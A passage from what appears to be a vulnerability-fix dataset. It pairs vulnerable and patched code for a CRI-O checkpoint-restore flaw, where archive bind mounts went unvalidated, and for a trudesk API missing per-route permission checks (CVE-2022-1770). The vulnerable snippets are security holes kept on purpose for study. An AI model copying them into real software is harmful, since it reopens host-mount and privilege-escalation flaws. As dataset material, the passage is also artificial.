:= ctr.SetNameAndID(\"\"); err != nil {\n\t\treturn \"\", fmt.Errorf(\"setting container name and ID: %w\", err)\n\t}\n\n\tif _, err = s.ReserveContainerName(ctr.ID(), ctr.Name()); err != nil {\n\t\treturn \"\", fmt.Errorf(\"kubelet may be retrying requests that are timing out in CRI-O due to system load: %w\", err)\n\t}\n\n\tdefer func() {\n\t\tif retErr != nil {\n\t\t\tlog.Infof(ctx, \"RestoreCtr: releasing container name %s\", ctr.Name())\n\t\t\ts.ReleaseContainerName(ctx, ctr.Name())\n\t\t}\n\t}()\n\tctr.SetRestore(true)\n\n\tnewContainer, err := s.createSandboxContainer(ctx, ctr, sb)\n\tif err != nil {\n\t\treturn \"\", err\n\t}\n\tdefer func() {\n\t\tif retErr != nil {\n\t\t\tlog.Infof(ctx, \"RestoreCtr: deleting container %s from storage\", ctr.ID())\n\t\t\terr2 := s.StorageRuntimeServer().DeleteContainer(ctx, ctr.ID())\n\t\t\tif err2 != nil {\n\t\t\t\tlog.Warnf(ctx, \"Failed to cleanup container directory: %v\", err2)\n\t\t\t}\n\t\t}\n\t}()\n\n\ts.addContainer(ctx, newContainer)\n\n\tdefer func() {\n\t\tif retErr != nil {\n\t\t\tlog.Infof(ctx, \"RestoreCtr: removing container %s\", newContainer.ID())\n\t\t\ts.removeContainer(ctx, newContainer)\n\t\t}\n\t}()\n\n\tif err := s.CtrIDIndex().Add(ctr.ID()); err != nil {\n\t\treturn \"\", err\n\t}\n\tdefer func() {\n\t\tif retErr != nil {\n\t\t\tlog.Infof(ctx, \"RestoreCtr: deleting container ID %s from idIndex\", ctr.ID())\n\t\t\tif err := s.CtrIDIndex().Delete(ctr.ID()); err != nil {\n\t\t\t\tlog.Warnf(ctx, \"Couldn't delete ctr id %s from idIndex\", ctr.ID())\n\t\t\t}\n\t\t}\n\t}()\n\n\tnewContainer.SetCreated()\n\tnewContainer.SetRestore(true)\n\tnewContainer.SetRestoreArchivePath(restoreArchivePath)\n\tnewContainer.SetRestoreStorageImageID(restoreStorageImageID)\n\tnewContainer.SetCheckpointedAt(config.CheckpointedAt)\n\n\tif isContextError(ctx.Err()) {\n\t\tlog.Infof(ctx, \"RestoreCtr: context was either canceled or the deadline was exceeded: %v\", ctx.Err())\n\t\treturn \"\", ctx.Err()\n\t}\n\treturn ctr.ID(), nil\n}"}], "fix_func": [{"id": "fix_go_161_1", "commit": "e8e7dcb", "file_path": "server/container_restore.go", "start_line": 55, "end_line": 394, "snippet": "func (s *Server) CRImportCheckpoint(\n\tctx context.Context,\n\tcreateConfig *types.ContainerConfig,\n\tsb *sandbox.Sandbox, sandboxUID string,\n) (ctrID string, retErr error) {\n\tvar mountPoint string\n\n\t// Ensure that the image to restore the checkpoint from has been provided.\n\tif createConfig.Image == nil || createConfig.Image.Image == \"\" {\n\t\treturn \"\", errors.New(`attribute \"image\" missing from container definition`)\n\t}\n\n\tif createConfig.Metadata == nil && createConfig.Metadata.Name == \"\" {\n\t\treturn \"\", errors.New(`attribute \"metadata\" missing from container definition`)\n\t}\n\n\tinputImage := createConfig.Image.Image\n\tcreateMounts := createConfig.Mounts\n\tcreateAnnotations := createConfig.Annotations\n\tcreateLabels := createConfig.Labels\n\n\trestoreStorageImageID, err := s.checkIfCheckpointOCIImage(ctx, inputImage)\n\tif err != nil {\n\t\treturn \"\", err\n\t}\n\n\tvar restoreArchivePath string\n\tif restoreStorageImageID != nil {\n\t\tsystemCtx, err := s.contextForNamespace(sb.Metadata().Namespace)\n\t\tif err != nil {\n\t\t\treturn \"\", fmt.Errorf(\"get context for namespace: %w\", err)\n\t\t}\n\t\t// WARNING: This hard-codes an assumption that SignaturePolicyPath set specifically for the namespace is never less restrictive\n\t\t// than the default system-wide policy, i.e. that if an image is successfully pulled, it always conforms to the system-wide policy.\n\t\tif systemCtx.SignaturePolicyPath != \"\" {\n\t\t\treturn \"\", fmt.Errorf(\"namespaced signature policy %s defined for pods in namespace %s; signature validation is not supported for container restore\", systemCtx.SignaturePolicyPath, sb.Metadata().Namespace)\n\t\t}\n\n\t\tlog.Debugf(ctx, \"Restoring from oci image %s\", inputImage)\n\n\t\t// This is not out-of-process, but it is at least out of the CRI-O codebase; containers/storage uses raw strings.\n\t\tmountPoint, err = s.ContainerServer.StorageImageServer().GetStore().MountImage(restoreStorageImageID.IDStringForOutOfProcessConsumptionOnly(), nil, \"\")\n\t\tif err != nil {\n\t\t\treturn \"\", err\n\t\t}\n\n\t\tlog.Debugf(ctx, \"Checkpoint image %s mounted at %v\\n\", restoreStorageImageID, mountPoint)\n\n\t\tdefer func() {\n\t\t\t// This is not out-of-process, but it is at least out of the CRI-O codebase; containers/storage uses raw strings.\n\t\t\tif _, err := s.ContainerServer.StorageImageServer().GetStore().UnmountImage(restoreStorageImageID.IDStringForOutOfProcessConsumptionOnly(), true); err != nil {\n\t\t\t\tlog.Errorf(ctx, \"Could not unmount checkpoint image %s: %q\", restoreStorageImageID, err)\n\t\t\t}\n\t\t}()\n\t} else {\n\t\t// First get the container definition from the\n\t\t// tarball to a temporary directory\n\t\tarchiveFile, err := os.Open(inputImage)\n\t\tif err != nil {\n\t\t\treturn \"\", fmt.Errorf(\"failed to open checkpoint archive %s for import: %w\", inputImage, err)\n\t\t}\n\t\tdefer func(f *os.File) {\n\t\t\tif err := f.Close(); err != nil {\n\t\t\t\tlog.Errorf(ctx, \"Unable to close file %s: %q\", f.Name(), err)\n\t\t\t}\n\t\t}(archiveFile)\n\n\t\trestoreArchivePath = inputImage\n\t\toptions := &archive.TarOptions{\n\t\t\t// Here we only need the files config.dump and spec.dump\n\t\t\tExcludePatterns: []string{\n\t\t\t\t\"artifacts\",\n\t\t\t\t\"ctr.log\",\n\t\t\t\tmetadata.RootFsDiffTar,\n\t\t\t\tmetadata.NetworkStatusFile,\n\t\t\t\tmetadata.DeletedFilesFile,\n\t\t\t\tmetadata.CheckpointDirectory,\n\t\t\t},\n\t\t}\n\t\tmountPoint, err = os.MkdirTemp(\"\", \"checkpoint\")\n\t\tif err != nil {\n\t\t\treturn \"\", err\n\t\t}\n\t\tdefer func() {\n\t\t\tif err := os.RemoveAll(mountPoint); err != nil {\n\t\t\t\tlog.Errorf(ctx, \"Could not recursively remove %s: %q\", mountPoint, err)\n\t\t\t}\n\t\t}()\n\t\terr = archive.Untar(archiveFile, mountPoint, options)\n\t\tif err != nil {\n\t\t\treturn \"\", fmt.Errorf(\"unpacking of checkpoint archive %s failed: %w\", mountPoint, err)\n\t\t}\n\t\tlog.Debugf(ctx, \"Unpacked checkpoint in %s\", mountPoint)\n\t}\n\n\t// Load spec.dump from temporary directory\n\tdumpSpec := new(spec.Spec)\n\tif _, err := metadata.ReadJSONFile(dumpSpec, mountPoint, metadata.SpecDumpFile); err != nil {\n\t\treturn \"\", fmt.Errorf(\"failed to read %q: %w\", metadata.SpecDumpFile, err)\n\t}\n\n\t// Load config.dump from temporary directory\n\tconfig := new(metadata.ContainerConfig)\n\tif _, err := metadata.ReadJSONFile(config, mountPoint, metadata.ConfigDumpFile); err != nil {\n\t\treturn \"\", fmt.Errorf(\"failed to read %q: %w\", metadata.ConfigDumpFile, err)\n\t}\n\n\toriginalAnnotations := make(map[string]string)\n\n\tif err := json.Unmarshal([]byte(dumpSpec.Annotations[annotations.Annotations]), &originalAnnotations); err != nil {\n\t\treturn \"\", fmt.Errorf(\"failed to read %q: %w\", annotations.Annotations, err)\n\t}\n\n\tif sandboxUID != \"\" {\n\t\tif _, ok := originalAnnotations[kubetypes.KubernetesPodUIDLabel]; ok {\n\t\t\toriginalAnnotations[kubetypes.KubernetesPodUIDLabel] = sandboxUID\n\t\t}\n\t}\n\n\tif createAnnotations != nil {\n\t\t// The hash also needs to be update or Kubernetes thinks the container needs to be restarted\n\t\t_, ok1 := createAnnotations[\"io.kubernetes.container.hash\"]\n\t\t_, ok2 := originalAnnotations[\"io.kubernetes.container.hash\"]\n\n\t\tif ok1 && ok2 {\n\t\t\toriginalAnnotations[\"io.kubernetes.container.hash\"] = createAnnotations[\"io.kubernetes.container.hash\"]\n\t\t}\n\t}\n\n\tstopMutex := sb.StopMutex()\n\tstopMutex.RLock()\n\tdefer stopMutex.RUnlock()\n\tif sb.Stopped() {\n\t\treturn \"\", fmt.Errorf(\"CreateContainer failed as the sandbox was stopped: %s\", sb.ID())\n\t}\n\n\tctr, err := container.New()\n\tif err != nil {\n\t\treturn \"\", fmt.Errorf(\"failed to create container: %w\", err)\n\t}\n\n\t// Newer checkpoints archives have RootfsImageRef set\n\t// and using it for the restore is more correct.\n\t// For the Kubernetes use case the output of 'crictl ps'\n\t// contains for the original container under 'IMAGE' something\n\t// like 'registry/path/container@sha256:123444444...'.\n\t// The restored container was, however, only displaying something\n\t// like 'registry/path/container'.\n\t// This had two problems, first, the output from the restored\n\t// container was different, but the bigger problem was, that\n\t// CRI-O might pull the wrong image from the registry.\n\t// If the container in the registry was updated (new latest tag)\n\t// all of a sudden the wrong base image would be downloaded.\n\trootFSImage := config.RootfsImageName\n\tif config.RootfsImageRef != \"\" {\n\t\tid, err := storage.ParseStorageImageIDFromOutOfProcessData(config.RootfsImageRef)\n\t\tif err != nil {\n\t\t\treturn \"\", fmt.Errorf(\"invalid RootfsImageRef %q: %w\", config.RootfsImageRef, err)\n\t\t}\n\t\t// This is not quite out-of-process consumption, but types.ContainerConfig is at least\n\t\t// a cross-process API, and this value is correct in that API.\n\t\trootFSImage = id.IDStringForOutOfProcessConsumptionOnly()\n\t}\n\tcontainerConfig := &types.ContainerConfig{\n\t\tMetadata: &types.ContainerMetadata{\n\t\t\tName: createConfig.Metadata.Name,\n\t\t\tAttempt: createConfig.Metadata.Attempt,\n\t\t},\n\t\tImage: &types.ImageSpec{\n\t\t\tImage: rootFSImage,\n\t\t},\n\t\tLinux: &types.LinuxContainerConfig{\n\t\t\tResources: &types.LinuxContainerResources{},\n\t\t\tSecurityContext: &types.LinuxContainerSecurityContext{},\n\t\t},\n\t\tAnnotations: originalAnnotations,\n\t\t// The labels are nod changed or adapted. They are just taken from the CRI\n\t\t// request without any modification (in contrast to the annotations).\n\t\tLabels: createLabels,\n\t}\n\n\tif createConfig.Linux != nil {\n\t\tif createConfig.Linux.Resources != nil {\n\t\t\tcontainerConfig.Linux.Resources = createConfig.Linux.Resources\n\t\t}\n\n\t\tif createConfig.Linux.SecurityContext != nil {\n\t\t\tcontainerConfig.Linux.SecurityContext = createConfig.Linux.SecurityContext\n\t\t}\n\t}\n\n\tif dumpSpec.Linux != nil {\n\t\tif dumpSpec.Linux.MaskedPaths != nil {\n\t\t\tcontainerConfig.Linux.SecurityContext.MaskedPaths = dumpSpec.Linux.MaskedPaths\n\t\t}\n\n\t\tif dumpSpec.Linux.ReadonlyPaths != nil {\n\t\t\tcontainerConfig.Linux.SecurityContext.ReadonlyPaths = dumpSpec.Linux.ReadonlyPaths\n\t\t}\n\t}\n\n\tignoreMounts := map[string]bool{\n\t\t\"/proc\": true,\n\t\t\"/dev\": true,\n\t\t\"/dev/pts\": true,\n\t\t\"/dev/mqueue\": true,\n\t\t\"/sys\": true,\n\t\t\"/sys/fs/cgroup\": true,\n\t\t\"/dev/shm\": true,\n\t\t\"/etc/resolv.conf\": true,\n\t\t\"/etc/hostname\": true,\n\t\t\"/run/secrets\": true,\n\t\t\"/run/.containerenv\": true,\n\t}\n\n\t// It is necessary to ensure that all bind mounts in the checkpoint archive are defined\n\t// in the create container requested coming in via the CRI. If this check would not\n\t// be here it would be possible to create a checkpoint archive that mounts some random\n\t// file/directory on the host with the user knowing as it will happen without specifying\n\t// it in the container definition.\n\tmissingMount := []string{}\n\n\tfor _, m := range dumpSpec.Mounts {\n\t\t// Following mounts are ignored as they might point to the\n\t\t// wrong location and if ignored the mounts will correctly\n\t\t// be setup to point to the new location.\n\t\tif ignoreMounts[m.Destination] {\n\t\t\tcontinue\n\t\t}\n\t\tmount := &types.Mount{\n\t\t\tContainerPath: m.Destination,\n\t\t}\n\n\t\tbindMountFound := false\n\t\tfor _, createMount := range createMounts {\n\t\t\tif createMount.ContainerPath == m.Destination {\n\t\t\t\tmount.HostPath = createMount.HostPath\n\t\t\t\tmount.Readonly = createMount.Readonly\n\t\t\t\tmount.RecursiveReadOnly = createMount.RecursiveReadOnly\n\t\t\t\tmount.Propagation = createMount.Propagation\n\t\t\t\tmount.RecursiveReadOnly = createMount.RecursiveReadOnly\n\t\t\t\tbindMountFound = true\n\t\t\t}\n\t\t}\n\t\tif !bindMountFound {\n\t\t\tmissingMount = append(missingMount, m.Destination)\n\t\t\t// If one mount is missing we can skip over any further code as we have\n\t\t\t// to abort the restore process anyway. Not using break to get all missing\n\t\t\t// mountpoints in one error message.\n\t\t\tcontinue\n\t\t}\n\n\t\tlog.Debugf(ctx, \"Adding mounts %#v\", mount)\n\t\tcontainerConfig.Mounts = append(containerConfig.Mounts, mount)\n\t}\n\tif len(missingMount) > 0 {\n\t\treturn \"\", fmt.Errorf(\n\t\t\t\"restoring %q expects following bind mounts defined (%s)\",\n\t\t\tinputImage,\n\t\t\tstrings.Join(missingMount, \",\"),\n\t\t)\n\t}\n\n\tsandboxConfig := &types.PodSandboxConfig{\n\t\tMetadata: &types.PodSandboxMetadata{\n\t\t\tName: sb.Metadata().Name,\n\t\t\tUid: sb.Metadata().Uid,\n\t\t\tNamespace: sb.Metadata().Namespace,\n\t\t\tAttempt: sb.Metadata().Attempt,\n\t\t},\n\t\tLinux: &types.LinuxPodSandboxConfig{},\n\t}\n\n\tif err := ctr.SetConfig(containerConfig, sandboxConfig); err != nil {\n\t\treturn \"\", fmt.Errorf(\"setting container config: %w\", err)\n\t}\n\n\tif err := ctr.SetNameAndID(\"\"); err != nil {\n\t\treturn \"\", fmt.Errorf(\"setting container name and ID: %w\", err)\n\t}\n\n\tif _, err = s.ReserveContainerName(ctr.ID(), ctr.Name()); err != nil {\n\t\treturn \"\", fmt.Errorf(\"kubelet may be retrying requests that are timing out in CRI-O due to system load: %w\", err)\n\t}\n\n\tdefer func() {\n\t\tif retErr != nil {\n\t\t\tlog.Infof(ctx, \"RestoreCtr: releasing container name %s\", ctr.Name())\n\t\t\ts.ReleaseContainerName(ctx, ctr.Name())\n\t\t}\n\t}()\n\tctr.SetRestore(true)\n\n\tnewContainer, err := s.createSandboxContainer(ctx, ctr, sb)\n\tif err != nil {\n\t\treturn \"\", err\n\t}\n\tdefer func() {\n\t\tif retErr != nil {\n\t\t\tlog.Infof(ctx, \"RestoreCtr: deleting container %s from storage\", ctr.ID())\n\t\t\terr2 := s.StorageRuntimeServer().DeleteContainer(ctx, ctr.ID())\n\t\t\tif err2 != nil {\n\t\t\t\tlog.Warnf(ctx, \"Failed to cleanup container directory: %v\", err2)\n\t\t\t}\n\t\t}\n\t}()\n\n\ts.addContainer(ctx, newContainer)\n\n\tdefer func() {\n\t\tif retErr != nil {\n\t\t\tlog.Infof(ctx, \"RestoreCtr: removing container %s\", newContainer.ID())\n\t\t\ts.removeContainer(ctx, newContainer)\n\t\t}\n\t}()\n\n\tif err := s.CtrIDIndex().Add(ctr.ID()); err != nil {\n\t\treturn \"\", err\n\t}\n\tdefer func() {\n\t\tif retErr != nil {\n\t\t\tlog.Infof(ctx, \"RestoreCtr: deleting container ID %s from idIndex\", ctr.ID())\n\t\t\tif err := s.CtrIDIndex().Delete(ctr.ID()); err != nil {\n\t\t\t\tlog.Warnf(ctx, \"Couldn't delete ctr id %s from idIndex\", ctr.ID())\n\t\t\t}\n\t\t}\n\t}()\n\n\tnewContainer.SetCreated()\n\tnewContainer.SetRestore(true)\n\tnewContainer.SetRestoreArchivePath(restoreArchivePath)\n\tnewContainer.SetRestoreStorageImageID(restoreStorageImageID)\n\tnewContainer.SetCheckpointedAt(config.CheckpointedAt)\n\n\tif isContextError(ctx.Err()) {\n\t\tlog.Infof(ctx, \"RestoreCtr: context was either canceled or the deadline was exceeded: %v\", ctx.Err())\n\t\treturn \"\", ctx.Err()\n\t}\n\treturn ctr.ID(), nil\n}"}], "vul_patch": "--- a/server/container_restore.go\n+++ b/server/container_restore.go\n@@ -8,6 +8,10 @@\n \t// Ensure that the image to restore the checkpoint from has been provided.\n \tif createConfig.Image == nil || createConfig.Image.Image == \"\" {\n \t\treturn \"\", errors.New(`attribute \"image\" missing from container definition`)\n+\t}\n+\n+\tif createConfig.Metadata == nil && createConfig.Metadata.Name == \"\" {\n+\t\treturn \"\", errors.New(`attribute \"metadata\" missing from container definition`)\n \t}\n \n \tinputImage := createConfig.Image.Image\n@@ -101,69 +105,25 @@\n \t\treturn \"\", fmt.Errorf(\"failed to read %q: %w\", metadata.ConfigDumpFile, err)\n \t}\n \n-\tctrMetadata := types.ContainerMetadata{}\n \toriginalAnnotations := make(map[string]string)\n-\toriginalLabels := make(map[string]string)\n-\n-\tif dumpSpec.Annotations[annotations.ContainerManager] == \"libpod\" {\n-\t\t// This is an import from Podman\n-\t\tctrMetadata.Name = config.Name\n-\t\tctrMetadata.Attempt = 0\n-\t} else {\n-\t\tif err := json.Unmarshal([]byte(dumpSpec.Annotations[annotations.Metadata]), &ctrMetadata); err != nil {\n-\t\t\treturn \"\", fmt.Errorf(\"failed to read %q: %w\", annotations.Metadata, err)\n-\t\t}\n-\t\tif createConfig.Metadata != nil && createConfig.Metadata.Name != \"\" {\n-\t\t\tctrMetadata.Name = createConfig.Metadata.Name\n-\t\t}\n-\t\tif err := json.Unmarshal([]byte(dumpSpec.Annotations[annotations.Annotations]), &originalAnnotations); err != nil {\n-\t\t\treturn \"\", fmt.Errorf(\"failed to read %q: %w\", annotations.Annotations, err)\n-\t\t}\n-\n-\t\tif err := json.Unmarshal([]byte(dumpSpec.Annotations[annotations.Labels]), &originalLabels); err != nil {\n-\t\t\treturn \"\", fmt.Errorf(\"failed to read %q: %w\", annotations.Labels, err)\n-\t\t}\n-\t\tif sandboxUID != \"\" {\n-\t\t\tif _, ok := originalLabels[kubetypes.KubernetesPodUIDLabel]; ok {\n-\t\t\t\toriginalLabels[kubetypes.KubernetesPodUIDLabel] = sandboxUID\n-\t\t\t}\n-\t\t\tif _, ok := originalAnnotations[kubetypes.KubernetesPodUIDLabel]; ok {\n-\t\t\t\toriginalAnnotations[kubetypes.KubernetesPodUIDLabel] = sandboxUID\n-\t\t\t}\n-\t\t}\n-\n-\t\tif createLabels != nil {\n-\t\t\tfixupLabels := []string{\n-\t\t\t\t// Update the container name. It has already been update in metadata.Name.\n-\t\t\t\t// It also needs to be updated in the container labels.\n-\t\t\t\tkubetypes.KubernetesContainerNameLabel,\n-\t\t\t\t// Update pod name in the labels.\n-\t\t\t\tkubetypes.KubernetesPodNameLabel,\n-\t\t\t\t// Also update namespace.\n-\t\t\t\tkubetypes.KubernetesPodNamespaceLabel,\n-\t\t\t}\n-\n-\t\t\tfor _, annotation := range fixupLabels {\n-\t\t\t\t_, ok1 := createLabels[annotation]\n-\t\t\t\t_, ok2 := originalLabels[annotation]\n-\n-\t\t\t\t// If the value is not set in the original container or\n-\t\t\t\t// if it is not set in the new container, just skip\n-\t\t\t\t// the step of updating metadata.\n-\t\t\t\tif ok1 && ok2 {\n-\t\t\t\t\toriginalLabels[annotation] = createLabels[annotation]\n-\t\t\t\t}\n-\t\t\t}\n-\t\t}\n-\n-\t\tif createAnnotations != nil {\n-\t\t\t// The hash also needs to be update or Kubernetes thinks the container needs to be restarted\n-\t\t\t_, ok1 := createAnnotations[\"io.kubernetes.container.hash\"]\n-\t\t\t_, ok2 := originalAnnotations[\"io.kubernetes.container.hash\"]\n-\n-\t\t\tif ok1 && ok2 {\n-\t\t\t\toriginalAnnotations[\"io.kubernetes.container.hash\"] = createAnnotations[\"io.kubernetes.container.hash\"]\n-\t\t\t}\n+\n+\tif err := json.Unmarshal([]byte(dumpSpec.Annotations[annotations.Annotations]), &originalAnnotations); err != nil {\n+\t\treturn \"\", fmt.Errorf(\"failed to read %q: %w\", annotations.Annotations, err)\n+\t}\n+\n+\tif sandboxUID != \"\" {\n+\t\tif _, ok := originalAnnotations[kubetypes.KubernetesPodUIDLabel]; ok {\n+\t\t\toriginalAnnotations[kubetypes.KubernetesPodUIDLabel] = sandboxUID\n+\t\t}\n+\t}\n+\n+\tif createAnnotations != nil {\n+\t\t// The hash also needs to be update or Kubernetes thinks the container needs to be restarted\n+\t\t_, ok1 := createAnnotations[\"io.kubernetes.container.hash\"]\n+\t\t_, ok2 := originalAnnotations[\"io.kubernetes.container.hash\"]\n+\n+\t\tif ok1 && ok2 {\n+\t\t\toriginalAnnotations[\"io.kubernetes.container.hash\"] = createAnnotations[\"io.kubernetes.container.hash\"]\n \t\t}\n \t}\n \n@@ -203,8 +163,8 @@\n \t}\n \tcontainerConfig := &types.ContainerConfig{\n \t\tMetadata: &types.ContainerMetadata{\n-\t\t\tName: ctrMetadata.Name,\n-\t\t\tAttempt: ctrMetadata.Attempt,\n+\t\t\tName: createConfig.Metadata.Name,\n+\t\t\tAttempt: createConfig.Metadata.Attempt,\n \t\t},\n \t\tImage: &types.ImageSpec{\n \t\t\tImage: rootFSImage,\n@@ -214,7 +174,9 @@\n \t\t\tSecurityContext: &types.LinuxContainerSecurityContext{},\n \t\t},\n \t\tAnnotations: originalAnnotations,\n-\t\tLabels: originalLabels,\n+\t\t// The labels are nod changed or adapted. They are just taken from the CRI\n+\t\t// request without any modification (in contrast to the annotations).\n+\t\tLabels: createLabels,\n \t}\n \n \tif createConfig.Linux != nil {\n@@ -251,6 +213,13 @@\n \t\t\"/run/.containerenv\": true,\n \t}\n \n+\t// It is necessary to ensure that all bind mounts in the checkpoint archive are defined\n+\t// in the create container requested coming in via the CRI. If this check would not\n+\t// be here it would be possible to create a checkpoint archive that mounts some random\n+\t// file/directory on the host with the user knowing as it will happen without specifying\n+\t// it in the container definition.\n+\tmissingMount := []string{}\n+\n \tfor _, m := range dumpSpec.Mounts {\n \t\t// Following mounts are ignored as they might point to the\n \t\t// wrong location and if ignored the mounts will correctly\n@@ -260,40 +229,38 @@\n \t\t}\n \t\tmount := &types.Mount{\n \t\t\tContainerPath: m.Destination,\n-\t\t\tHostPath: m.Source,\n-\t\t}\n-\n+\t\t}\n+\n+\t\tbindMountFound := false\n \t\tfor _, createMount := range createMounts {\n \t\t\tif createMount.ContainerPath == m.Destination {\n \t\t\t\tmount.HostPath = createMount.HostPath\n-\t\t\t}\n-\t\t}\n-\n-\t\tfor _, opt := range m.Options {\n-\t\t\tswitch opt {\n-\t\t\tcase \"ro\":\n-\t\t\t\tmount.Readonly = true\n-\t\t\tcase \"rro\":\n-\t\t\t\tmount.RecursiveReadOnly = true\n-\t\t\tcase \"rprivate\":\n-\t\t\t\tmount.Propagation = types.MountPropagation_PROPAGATION_PRIVATE\n-\t\t\tcase \"rshared\":\n-\t\t\t\tmount.Propagation = types.MountPropagation_PROPAGATION_BIDIRECTIONAL\n-\t\t\tcase \"rslaved\":\n-\t\t\t\tmount.Propagation = types.MountPropagation_PROPAGATION_HOST_TO_CONTAINER\n-\t\t\t}\n-\t\t}\n-\n-\t\t// Recursive Read-only (RRO) support requires the mount to be\n-\t\t// read-only and the mount propagation set to private.\n-\t\tif mount.RecursiveReadOnly {\n-\t\t\tmount.Readonly = true\n-\t\t\tmount.Propagation = types.MountPropagation_PROPAGATION_PRIVATE\n+\t\t\t\tmount.Readonly = createMount.Readonly\n+\t\t\t\tmount.RecursiveReadOnly = createMount.RecursiveReadOnly\n+\t\t\t\tmount.Propagation = createMount.Propagation\n+\t\t\t\tmount.RecursiveReadOnly = createMount.RecursiveReadOnly\n+\t\t\t\tbindMountFound = true\n+\t\t\t}\n+\t\t}\n+\t\tif !bindMountFound {\n+\t\t\tmissingMount = append(missingMount, m.Destination)\n+\t\t\t// If one mount is missing we can skip over any further code as we have\n+\t\t\t// to abort the restore process anyway. Not using break to get all missing\n+\t\t\t// mountpoints in one error message.\n+\t\t\tcontinue\n \t\t}\n \n \t\tlog.Debugf(ctx, \"Adding mounts %#v\", mount)\n \t\tcontainerConfig.Mounts = append(containerConfig.Mounts, mount)\n \t}\n+\tif len(missingMount) > 0 {\n+\t\treturn \"\", fmt.Errorf(\n+\t\t\t\"restoring %q expects following bind mounts defined (%s)\",\n+\t\t\tinputImage,\n+\t\t\tstrings.Join(missingMount, \",\"),\n+\t\t)\n+\t}\n+\n \tsandboxConfig := &types.PodSandboxConfig{\n \t\tMetadata: &types.PodSandboxMetadata{\n \t\t\tName: sb.Metadata().Name,\n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2022-1770", "cve_description": "Improper Privilege Management in GitHub repository polonel/trudesk prior to 1.2.2.", "cwe_info": {"CWE-269": {"name": "Improper Privilege Management", "description": "The product does not properly assign, modify, track, or check privileges for an actor, creating an unintended sphere of control for that actor."}}, "repo": "https://github.com/polonel/trudesk", "patch_url": ["https://github.com/polonel/trudesk/commit/889876f66c9a5b28f019258e329310c31d72cbd2"], "programing_language": "JavaScript", "vul_func": [{"id": "vul_js_183_1", "commit": "c78ae09", "file_path": "src/controllers/api/v2/routes.js", "start_line": 15, "end_line": 74, "snippet": "module.exports = function (middleware, router, controllers) {\n // Shorten Vars\n const apiv2Auth = middleware.apiv2\n const apiv2 = controllers.api.v2\n const isAdmin = middleware.isAdmin\n const isAgent = middleware.isAgent\n const isAgentOrAdmin = middleware.isAgentOrAdmin\n const canUser = middleware.canUser\n\n // Common\n router.post('/api/v2/login', controllers.api.v2.common.login)\n router.post('/api/v2/token', controllers.api.v2.common.token)\n\n // Accounts\n router.get('/api/v2/accounts', apiv2Auth, apiv2.accounts.get)\n router.post('/api/v2/accounts', apiv2Auth, apiv2.accounts.create)\n router.put('/api/v2/accounts/:username', apiv2Auth, apiv2.accounts.update)\n\n // Tickets\n router.get('/api/v2/tickets', apiv2Auth, apiv2.tickets.get)\n router.post('/api/v2/tickets', apiv2Auth, apiv2.tickets.create)\n router.post('/api/v2/tickets/transfer/:uid', apiv2Auth, isAdmin, apiv2.tickets.transferToThirdParty)\n router.get('/api/v2/tickets/:uid', apiv2Auth, apiv2.tickets.single)\n router.put('/api/v2/tickets/batch', apiv2Auth, apiv2.tickets.batchUpdate)\n router.put('/api/v2/tickets/:uid', apiv2Auth, apiv2.tickets.update)\n router.delete('/api/v2/tickets/:uid', apiv2Auth, apiv2.tickets.delete)\n router.delete('/api/v2/tickets/deleted/:id', apiv2Auth, isAdmin, apiv2.tickets.permDelete)\n\n // Groups\n router.get('/api/v2/groups', apiv2Auth, apiv2.groups.get)\n router.post('/api/v2/groups', apiv2Auth, apiv2.groups.create)\n router.put('/api/v2/groups/:id', apiv2Auth, apiv2.groups.update)\n router.delete('/api/v2/groups/:id', apiv2Auth, apiv2.groups.delete)\n\n // Teams\n router.get('/api/v2/teams', apiv2Auth, apiv2.teams.get)\n router.post('/api/v2/teams', apiv2Auth, apiv2.teams.create)\n router.put('/api/v2/teams/:id', apiv2Auth, apiv2.teams.update)\n router.delete('/api/v2/teams/:id', apiv2Auth, apiv2.teams.delete)\n\n // Departments\n router.get('/api/v2/departments', apiv2Auth, apiv2.departments.get)\n router.post('/api/v2/departments', apiv2Auth, apiv2.departments.create)\n router.put('/api/v2/departments/:id', apiv2Auth, apiv2.departments.update)\n router.delete('/api/v2/departments/:id', apiv2Auth, apiv2.departments.delete)\n\n // Notices\n router.get('/api/v2/notices', apiv2Auth, apiv2.notices.get)\n router.put('/api/v2/notices/:id', apiv2Auth, canUser('notices:update'), apiv2.notices.update)\n router.put('/api/v2/notices/:id/activate', apiv2Auth, canUser('notices:activate'), apiv2.notices.activate)\n router.get('/api/v2/notices/clear', apiv2Auth, canUser('notices:deactivate'), apiv2.notices.clear)\n router.delete('/api/v2/notices/:id', apiv2Auth, canUser('notices:delete'), apiv2.notices.delete)\n\n // ElasticSearch\n router.get('/api/v2/es/search', middleware.api, apiv2.elasticsearch.search)\n router.get('/api/v2/es/rebuild', apiv2Auth, isAdmin, apiv2.elasticsearch.rebuild)\n router.get('/api/v2/es/status', apiv2Auth, isAdmin, apiv2.elasticsearch.status)\n\n router.get('/api/v2/mailer/check', apiv2Auth, isAdmin, apiv2.mailer.check)\n}"}], "fix_func": [{"id": "fix_js_183_1", "commit": "889876f", "file_path": "src/controllers/api/v2/routes.js", "start_line": 15, "end_line": 74, "snippet": "module.exports = function (middleware, router, controllers) {\n // Shorten Vars\n const apiv2Auth = middleware.apiv2\n const apiv2 = controllers.api.v2\n const isAdmin = middleware.isAdmin\n const isAgent = middleware.isAgent\n const isAgentOrAdmin = middleware.isAgentOrAdmin\n const canUser = middleware.canUser\n\n // Common\n router.post('/api/v2/login', controllers.api.v2.common.login)\n router.post('/api/v2/token', controllers.api.v2.common.token)\n\n // Accounts\n router.get('/api/v2/accounts', apiv2Auth, canUser('accounts:view'), apiv2.accounts.get)\n router.post('/api/v2/accounts', apiv2Auth, canUser('accounts:create'), apiv2.accounts.create)\n router.put('/api/v2/accounts/:username', canUser('accounts:update'), apiv2Auth, apiv2.accounts.update)\n\n // Tickets\n router.get('/api/v2/tickets', apiv2Auth, canUser('tickets:view'), apiv2.tickets.get)\n router.post('/api/v2/tickets', apiv2Auth, canUser('tickets:create'), apiv2.tickets.create)\n router.post('/api/v2/tickets/transfer/:uid', apiv2Auth, isAdmin, apiv2.tickets.transferToThirdParty)\n router.get('/api/v2/tickets/:uid', apiv2Auth, canUser('tickets:view'), apiv2.tickets.single)\n router.put('/api/v2/tickets/batch', apiv2Auth, canUser('tickets:update'), apiv2.tickets.batchUpdate)\n router.put('/api/v2/tickets/:uid', apiv2Auth, canUser('tickets:update'), apiv2.tickets.update)\n router.delete('/api/v2/tickets/:uid', apiv2Auth, canUser('tickets:delete'), apiv2.tickets.delete)\n 